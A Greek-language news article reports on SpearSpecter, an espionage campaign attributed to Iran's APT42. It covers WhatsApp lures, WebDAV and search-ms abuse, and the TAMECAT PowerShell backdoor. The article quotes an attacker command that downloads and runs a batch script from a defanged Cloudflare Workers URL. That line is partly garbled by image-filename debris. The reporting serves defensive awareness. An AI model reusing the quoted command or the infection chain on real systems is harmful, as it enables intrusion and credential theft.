Μια επικίνδυνη εκστρατεία κατασκοπείας στοχεύει ανώτερους κυβερνητικούς και αμυντικούς αξιωματούχους σε όλο τον κόσμο. Ιρανοί χάκερ χρησιμοποιούν ψεύτικες προσκλήσεις για συνέδρια και αιτήματα συνάντησης για να ξεγελάσουν τα θύματα.
Οι επιτιθέμενοι ξοδεύουν εβδομάδες χτίζοντας εμπιστοσύνη πριν χτυπήσουν. Απευθύνονται μέσω WhatsApp για να κάνουν τα μηνύματά τους να φαίνονται νόμιμα.
Αυτή η καμπάνια, γνωστή ως SpearSpecter, συνδυάζει την υπομονή με ισχυρό κακόβουλο λογισμικό για την κλοπή ευαίσθητων πληροφοριών.
Οι δράστες εργάζονται για τον Οργανισμό Πληροφοριών του Σώματος των Φρουρών της Ισλαμικής Επανάστασης του Ιράν. Λειτουργούν με διάφορα ονόματα όπως APT42, Mint Sandstorm, Educated Manticore και CharmingCypress.
Ο κύριος στόχος τους είναι να κλέβουν ευαίσθητες πληροφορίες από άτομα με πρόσβαση σε κυβερνητικά μυστικά. Αυτό που κάνει αυτή την ομάδα επικίνδυνη είναι το πώς προσαρμόζουν τις μεθόδους τους και χρησιμοποιούν τόσο κλοπή διαπιστευτηρίων όσο και μακροπρόθεσμα εργαλεία κατασκοπείας.
Ερευνητές ασφάλειας της Εθνικής Ψηφιακής Υπηρεσίας του Ισραήλ αναγνωρισθείς το κακόβουλο λογισμικό και αποκάλυψε το εύρος λειτουργίας. Η καμπάνια τρέχει εδώ και μήνες χωρίς σημάδια διακοπής.
Οι επιτιθέμενοι στοχεύουν τόσο αξιωματούχους όσο και μέλη της οικογένειας για να αυξήσουν την πίεση και να βρουν νέα σημεία εισόδου.
Προηγμένη μόλυνση μέσω WebDAV και PowerShell
Η μόλυνση ξεκινά όταν τα θύματα λαμβάνουν έναν σύνδεσμο που ισχυρίζεται ότι είναι ένα σημαντικό έγγραφο για μια συνάντηση. Όταν κάνετε κλικ, ο σύνδεσμος ανακατευθύνεται σε ένα αρχείο στο OneDrive.
Οι εισβολείς κάνουν κατάχρηση του πρωτοκόλλου αναζήτησης-ms των Windows για να ενεργοποιήσουν ένα αναδυόμενο παράθυρο που ζητά από τους χρήστες να ανοίξουν την Εξερεύνηση των Windows. Εάν τα θύματα αποδεχτούν, ο υπολογιστής τους συνδέεται με τον διακομιστή WebDAV του εισβολέα.
Ο διακομιστής WebDAV εμφανίζει κάτι που μοιάζει με αρχείο PDF, αλλά στην πραγματικότητα είναι μια κακόβουλη συντόμευση. Όταν ανοίξει, αυτή η συντόμευση εκτελεί κρυφές εντολές που πραγματοποιούν λήψη ενός σεναρίου δέσμης από το Cloudflare Workers χρησιμοποιώντας την ακόλουθη εντολή:-
cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%.webp.png)
Το σενάριο φορτώνει το TAMECAT, ένα εξελιγμένο backdoor που βασίζεται στο PowerShell που λειτουργεί εξ ολοκλήρου στη μνήμη. Το TAMECAT χρησιμοποιεί κρυπτογράφηση AES-256 για να επικοινωνεί με διακομιστές εντολών μέσω πολλαπλών καναλιών, συμπεριλαμβανομένων της κυκλοφορίας ιστού, του Telegram και του Discord.
Το TAMECAT συλλέγει τους κωδικούς πρόσβασης του προγράμματος περιήγησης εκκινώντας τον Microsoft Edge με απομακρυσμένο εντοπισμό σφαλμάτων και αναστολή των διαδικασιών του Chrome. Καταγράφει στιγμιότυπα οθόνης κάθε δεκαπέντε δευτερόλεπτα και αναζητά έγγραφα. Όλα τα κλεμμένα δεδομένα χωρίζονται σε κομμάτια πέντε megabyte και ανεβαίνουν.
.webp)
Για να επιβιώσουν οι επανεκκινήσεις, το TAMECAT δημιουργεί καταχωρήσεις μητρώου που εκτελούν αρχεία δέσμης κατά τη σύνδεση. Το κακόβουλο λογισμικό αποφεύγει τον εντοπισμό χρησιμοποιώντας αξιόπιστα προγράμματα των Windows. Οι ερευνητές βρήκαν επιτιθέμενους που χρησιμοποιούν το Cloudflare Workers για υποδομή εντολών.
